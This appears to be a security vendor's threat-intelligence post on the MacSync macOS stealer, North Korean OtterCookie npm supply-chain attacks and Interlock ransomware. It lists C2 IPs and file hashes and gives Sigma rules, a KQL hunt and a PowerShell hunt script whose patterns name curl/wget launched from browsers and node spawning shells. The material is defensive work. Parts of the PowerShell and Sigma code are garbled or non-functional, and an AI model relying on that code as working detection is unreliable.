Back to Intelligence

MacSync & OtterCookie Stealers: North Korean Supply Chain & macOS Campaigns with Interlock Ransomware CVE Exploits — OTX Analysis

SA
Security Arsenal Team
April 14, 2026
6 min read

Intelligence Source: AlienVault OTX Live Pulses Date: 2026-04-14 Author: Security Arsenal Threat Intelligence Unit

Threat Summary

Recent OTX pulses reveal a convergence of high-impact threats targeting distinct sectors: SLTT Government macOS users and the Technology supply chain.

  1. macOS MaaS Campaign: The MacSync Stealer campaign has evolved into a sophisticated Malware-as-a-Service (MaaS) operation. It is actively targeting State, Local, Tribal, and Territorial (SLTT) government entities using SEO poisoning and "ClickFix" fake CAPTCHA techniques. The malware has shifted to shell-based loaders delivering dynamic AppleScript payloads.

  2. North Korean Supply Chain Attack: The FAMOUS CHOLLIMA threat actor is leveraging the npm ecosystem to distribute the OtterCookie infostealer. Using a "contagious interview" scam and typosquatting, they clone legitimate libraries (e.g., big.js) to deliver payloads like BeaverTail and InvisibleFerret, aiming at technology sector developers.

  3. Ransomware & Zero-Day Exploitation: The Interlock Ransomware Group is exploiting critical vulnerabilities, most notably a zero-day in Cisco Firepower Management Center (CVE-2026-20131). This facilitates the deployment of custom malware including GHOSTKNIFE and PlasmaLoader.

Collectively, these threats demonstrate an aggressive push for initial access via social engineering and supply chain compromise, followed immediately by credential theft and ransomware deployment.

Threat Actor / Malware Profile

MacSync Stealer (Unknown Actor)

  • Type: Infostealer / MaaS
  • Target: macOS users (Government/SLTT)
  • Distribution: SEO Poisoning, Fake ClickFix CAPTCHAs, malicious "ChatGPT" conversations.
  • Payload: Shell-based loaders executing dynamic AppleScript.
  • Capability: Steals cryptocurrency wallets (Ledger), browser data, and system information.

FAMOUS CHOLLIMA (OtterCookie Campaign)

  • Attribution: North Korean APT (Lazarus Group adjunct).
  • Type: Supply Chain Attack / Infostealer
  • Target: Software Developers / Technology Sector
  • Distribution: Malicious npm packages (obfuscated), dependency confusion.
  • Malware: OtterCookie, BeaverTail, InvisibleFerret, Koalemos.
  • C2: Vercel-based C2 infrastructure and raw IP communication.
  • Persistence: SSH backdoor installation.

Interlock Ransomware Group

  • Type: Ransomware-as-a-Service / Exploitation
  • Tooling: GHOSTKNIFE, GHOSTSABER, PlasmaLoader, PLASMAGRID.
  • Vector: Exploitation of CVE-2026-20131 (Cisco FMC Zero-Day) and other high-risk CVEs.

IOC Analysis

The provided pulses offer a mix of infrastructure and file-based indicators:

  • File Hashes (SHA256/MD5): Specific to the MacSync Stealer payloads. These should be used to scan endpoints for malware artifacts.
  • Domains/Hostnames: Compromised legitimate domains (e.g., houstongaragedoorinstallers.com) used for C2 or distribution in the MacSync campaign. These should be sinkholed or blocked at the proxy/DNS level.
  • IPv4 Addresses: A cluster of IPs (e.g., 144.172.110.228) associated with the OtterCookie C2 infrastructure.
  • CVEs: Critical identifiers (e.g., CVE-2026-20131) requiring immediate patch management prioritization.

Operationalizing IOCs:

  • EDR: Hunt for file hashes on macOS endpoints.
  • Firewall/Proxy: Block the listed domains and IP subnets.
  • Vulnerability Management: Immediately scan for Cisco FMC and other vulnerabilities listed in the Interlock pulse.

Detection Engineering

The following detection logic is tailored to the specific behaviors of MacSync (macOS scripting), OtterCookie (Node.js supply chain), and Interlock (Infrastructure exploitation).

YAML
---
title: macOS MacSync Stealer Suspicious AppleScript Execution
description: Detects shell-based loaders executing dynamic AppleScript payloads associated with MacSync Stealer, often triggered via fake browser workflows.
status: experimental
date: 2026/04/14
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/66000000000/
tags:
    - attack.execution
    - attack.t1059.002
logsource:
    product: macos
    category: process_creation
detection:
    selection:
        ParentImage|endswith:
            - '/Google Chrome'
            - '/Firefox'
            - '/Safari'
        Image|endswith:
            - '/osascript'
            - '/sh'
            - '/zsh'
        CommandLine|contains:
            - 'curl'
            - 'wget'
            - 'http://'
            - 'https://'
    condition: selection
falsepositives:
    - Legitimate administrative automation scripts
level: high
---
title: OtterCookie Node.js Supply Chain Attack
description: Detects Node.js processes spawning shell or PowerShell, a hallmark of the OtterCookie/BeaverTail npm supply chain campaign.
status: experimental
date: 2026/04/14
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/66000000001/
tags:
    - attack.execution
    - attack.t1059.001
    - attack.t1204.002
logsource:
    product: windows
    category: process_creation
detection:
    selection_parent:
        ParentImage|endswith:
            - '\
ode.exe'
            - 'node'
    selection_child:
        Image|endswith:
            - '\\powershell.exe'
            - '\\cmd.exe'
            - '\bash.exe'
            - '\\wsl.exe'
    condition: selection_parent and selection_child
falsepositives:
    - Legitimate developer build scripts (low volume)
level: high
---
title: Interlock Ransomware PlasmaLoader C2 Activity
description: Detects potential connections to known C2 infrastructure associated with the Interlock Ransomware Group and OtterCookie campaigns.
status: experimental
date: 2026/04/14
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/66000000002/
tags:
    - attack.command_and_control
    - attack.c2
logsource:
    category: network_connection
detection:
    selection:
        DestinationIp|contains:
            - '144.172.110.'
            - '107.189.22.'
    condition: selection
falsepositives:
    - None (Known malicious IP ranges)
level: critical

KQL Hunt (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for OtterCookie/Interlock C2 IPs and MacSync Hashes
let IOCs = dynamic([
    "144.172.110.228", "144.172.110.96", "144.172.110.132", "107.189.22.20",
    "5190ef1733183a0dc63fb623357f56d6", // MacSync MD5
    "866993e9950250ac2ce8c3b4c6a8bd39285e0fafd93860f235a3b0370f160dd1" // MacSync SHA256
]);
// Network Connections to C2 Infrastructure
DeviceNetworkEvents
| where RemoteIP in (IOCs) 
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteIP, RemotePort, RemoteUrl
| extend Alert = "C2 Connection to OtterCookie/Interlock IP";
// File Artifacts for MacSync
DeviceFileEvents
| where SHA256 in (IOCs) or MD5 in (IOCs)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, MD5
| extend Alert = "MacSync Stealer File Detected";

PowerShell Hunt Script

PowerShell
# IOC Hunter for MacSync Hashes and OtterCookie C2 IPs

Requires Admin privileges for accurate network enumeration

$MacSyncHashes = @( "866993e9950250ac2ce8c3b4c6a8bd39285e0fafd93860f235a3b0370f160dd1", "b2955c54eb0c047463993b379e015e737aabed37b456aeb0957cf84cdb0ed1f0", "c56a1b268f358d9fb4d6264932706b53a7347e2544bb5f26355b0c7fc1d299d8" )

$OtterCookieIPs = @( "144.172.110.228", "144.172.110.96", "144.172.110.132", "144.172.116.22", "144.172.93.169", "144.172.93.253", "144.172.99.248", "107.189.22.20" )

Write-Host "[+] Scanning for MacSync Stealer File Hashes..." -ForegroundColor Cyan Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | Where-Object { $.Length -gt 0kb -and $MacSyncHashes -contains $.Hash } | Select-Object FullName, LastWriteTime | Format-Table

Write-Host "[+] Checking Active Network Connections for OtterCookie C2 IPs..." -ForegroundColor Cyan $netstat = netstat -ano | Select-String -Pattern "\s+(TCP|UDP)" foreach ($line in $netstat) { $parts = $line -split "\s+" $local = $parts[2] $remote = $parts[3] $state = $parts[4] $pid = $parts[5]

Code
$remoteIP = ($remote -split ":")[0]
if ($OtterCookieIPs -contains $remoteIP) {
    $process = Get-Process -Id $pid -ErrorAction SilentlyContinue
    Write-Host "[!] Suspicious Connection: $remote (PID: $pid - Process: $($process.ProcessName))" -ForegroundColor Red
}

}

Response Priorities

  • Immediate (0-24h):

    • Block all IOCs (Domains and IP ranges) at the network perimeter.
    • Scan macOS endpoints for the identified MacSync Stealer file hashes.
    • Identify and block the malicious npm packages associated with the OtterCookie campaign in internal artifact repositories.

  • 24h - 48h:

    • Credential Reset: If MacSync or OtterCookie execution is suspected, force reset of cryptocurrency wallets, SSH keys, and browser-saved credentials for affected users.
    • Hunt: Run the provided PowerShell/KQL queries to identify lateral movement or persistence.

  • 1 Week:

    • Patch Management: Prioritize patching for CVE-2026-20131 (Cisco FMC) and the 31 high-impact vulnerabilities listed in the March 2026 CVE landscape.
    • Supply Chain Hardening: Implement strict package verification and allow-listing for npm/internal package registries.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-aptmacsync-stealerottercookiefamous-chollimainterlock-ransomwaresupply-chain-attack

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action